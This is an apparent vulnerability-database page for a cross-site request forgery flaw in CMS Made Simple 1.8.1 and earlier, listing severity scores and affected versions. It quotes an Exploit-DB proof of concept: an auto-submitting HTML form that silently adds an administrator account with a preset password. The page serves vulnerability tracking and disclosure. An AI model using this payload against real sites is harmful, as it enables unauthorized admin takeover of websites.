CVE-2010-3884
Notifications for a CVE
Stay informed of any changes for a specific CVE.
CVE Descriptions
Cross-site request forgery (CSRF) vulnerability in CMS Made Simple 1.8.1 and earlier allows remote attackers to hijack the authentication of administrators for requests that reset the administrative password. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
CVE Informations
Related Weaknesses
| Weakness Name | Source | |
|---|---|---|
| Cross-Site Request Forgery (CSRF) The web application does not, or can not, sufficiently verify whether a well-formed, valid, consistent request was intentionally provided by the user who submitted the request. |
Metrics
| Metrics | Score | Severity | CVSS Vector | Source |
|---|---|---|---|---|
| V2 | 6.8 | AV:N/AC:M/Au:N/C:P/I:P/A:P | [email protected] |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 12009
Publication date : 2010-04-01 22h00 +00:00
Author : pratul agrawal
EDB Verified : No
=======================================================================
CMS Made Simple 1.7 CSRF Vulnerability
=======================================================================
# Vulnerability found in- Admin module
# email [email protected]
# company aksitservices
# Credit by Pratul Agrawal
# Software CMS Made Simple 1.7
# Category CMS / Portals
# Site p4ge http://server/demo/2/10/CMS_Made_Simple
# Plateform php
# Greetz to Gaurav, Prateek, Vivek, Sanjay, Sourabh, Varun, sameer (My Web Team)
# Proof of concept #
Targeted URL: http://sever/demo/2/10/CMS_Made_Simple
Script to Add admin user through Cross Site request forgery
. ................................................................................................................
<html>
<body>
<form name="csrf" action="http://server/cmsmadesimple/admin/adduser.php" method="post">
<input type=hidden name="sp_" value="64becc90">
<input type=hidden name="user" value="master">
<input type=hidden name="password" value="master">
<input type=hidden name="passwordagain" value="master">
<input type=hidden name="firstname" value="12345">
<input type=hidden name="lastname" value="12345">
<input type=hidden name="email" value="[email protected]">
<input type=hidden name="active" value="on">
<input type=hidden name="groups" value="1">
<input type=hidden name="g1" value="1">
<input type=hidden name="adduser" value="true">
</form>
<script>
document.csrf.submit();
</script>
</body>
</html>
. ..................................................................................................................
After execution just refresh the page and we can see that the admin user added automatically.
#If you have any questions, comments, or concerns, feel free to contact me.
Products Mentioned
Configuraton 0
Cmsmadesimple>>Cms_made_simple >> Version To (including) 1.8.1
- Cmsmadesimple>>Cms_made_simple >> Version - (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 0.1 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 0.2 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 0.2.1 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 0.3 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 0.3.1 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 0.3.2 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 0.4 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 0.4.1 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 0.5 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 0.5.1 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 0.6 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 0.6.1 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 0.6.2 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 0.6.3 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 0.7 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 0.7.1 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 0.7.2 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 0.7.3 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 0.8 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 0.8.1 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 0.8.2 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 0.9 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 0.9.1 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 0.9.2 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 0.10 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 0.10.1 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 0.10.2 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 0.10.3 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 0.10.4 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 0.11 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 0.11.1 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 0.11.2 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 0.12 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 0.12.1 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 0.12.2 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 0.13 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 1.0 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 1.0.1 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 1.0.2 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 1.0.3 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 1.0.4 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 1.0.5 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 1.0.6 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 1.0.7 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 1.0.8 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 1.1 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 1.1.1 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 1.1.2 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 1.1.2.1 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 1.1.3 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 1.1.3.1 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 1.1.4 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 1.1.4.1 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 1.2 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 1.2.1 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 1.2.2 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 1.2.3 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 1.2.4 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 1.2.5 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 1.3 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 1.3 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 1.3 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 1.3.1 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 1.4 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 1.4.1 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 1.5 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 1.5.1 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 1.5.2 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 1.5.3 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 1.5.4 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 1.6 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 1.6.1 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 1.6.2 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 1.6.3 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 1.6.4 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 1.6.5 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 1.6.6 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 1.6.7 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 1.6.8 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 1.6.9 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 1.6.10 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 1.7 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 1.7.1 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 1.8 (Open CPE detail)
- Cmsmadesimple>>Cms_made_simple >> Version 1.8.1 (Open CPE detail)
References
2025©
tesweb SA
